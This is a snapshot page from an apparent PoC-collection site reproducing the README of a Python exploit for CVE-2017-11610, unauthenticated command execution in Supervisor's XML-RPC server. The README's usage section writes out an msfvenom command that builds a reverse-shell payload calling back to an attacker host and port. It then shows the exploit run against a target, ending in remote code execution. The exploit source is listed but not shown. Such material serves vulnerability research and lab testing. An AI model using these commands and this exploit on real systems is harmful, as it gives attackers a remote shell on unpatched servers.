Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2017-11610 PoC — Supervisor XML-RPC服务器安全漏洞

Source
https://github.com/ivanitlearning/CVE-2017-11610
Associated Vulnerability
Title:Supervisor XML-RPC服务器安全漏洞 (CVE-2017-11610)
Description:Supervisor是一套进程控制系统,用于监视和控制类Unix系统上的进程。XML-RPC server是其中的一个XML-RPC服务器。 Supervisor中的XML-RPC服务器存在安全漏洞。远程攻击者可借助特制的XML-RPC请求利用该漏洞执行任意命令。以下版本受到影响:supervisor 3.0.1之前的版本,3.1.4之前的3.1.x版本,3.2.4之前的3.2.x版本,3.3.3之前的3.3.x版本。
Description
Standalone Python ≥3.6 RCE Unauthenticated exploit for Supervisor 3.0a1 to 3.3.2
Readme
# CVE-2017-11610 Unauthenticated Reverse Shell RCE for Supervisor 3.0a1 - 3.3.2
Standalone Python ≥3.6 Unauthenticated RCE exploit for Supervisor 3.0a1 to 3.3.2, rewritten from this [Metasploit module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb). Explanatory [post here](https://ivanitlearning.wordpress.com/2019/11/05/ruby-exploit-rewrite-supervisor-3-0a1-to-3-3-2-unauthenticated-rce/).

Tested with Python 3.7 on [this target](https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610) runing Supervisor 3.3.2

## Usage:
```
root@Kali:~/Infosec/RubyStuff/Supervisor-3.3.2# ./exploit.py -h
usage: exploit.py [-h] -rhost RHOST [-rport RPORT] -payload PAYLOAD
                  [-rpcpath RPCPATH]

Generate the payload first, eg: 
msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4445 -f elf -o dir/payload.elf

Required arguments:
  -rhost RHOST      Target host running Supervisor eg. 192.168.92.153
  -payload PAYLOAD  Path to the ELF payload. eg dir/payload.elf

Optional arguments:
  -rport RPORT      Target port running Supervisor. Default: 9001
  -rpcpath RPCPATH  Path to the XML-RPC endpoint on Supervisor. Default: '/RPC2' as in http://192.168.92.153:9001/RPC2

Call the exploit like this: 
 ./exploit.py -rhost 192.168.92.153 -rport 9001 -rpcpath /RPC2 -payload dir/payload.elf
root@Kali:~/Infosec/RubyStuff/Supervisor-3.3.2# msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4445 -f elf -o payload.elf
No encoder or badchars specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: payload.elf
root@Kali:~/Infosec/RubyStuff/Supervisor-3.3.2# ./exploit.py -rhost 192.168.92.153 -payload payload.elf
Extracting version from web interface..
Vulnerable version found: 3.3.2
Sending XML-RPC payload via POST to 192.168.92.153:9001/RPC2
Successful remote code execution
```
File Snapshot

 [4.0K]  /data/pocs/bfcce2903eb258fc507744dc4414228b7d2203d5
├── [5.2K]  exploit.py
└── [1.9K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.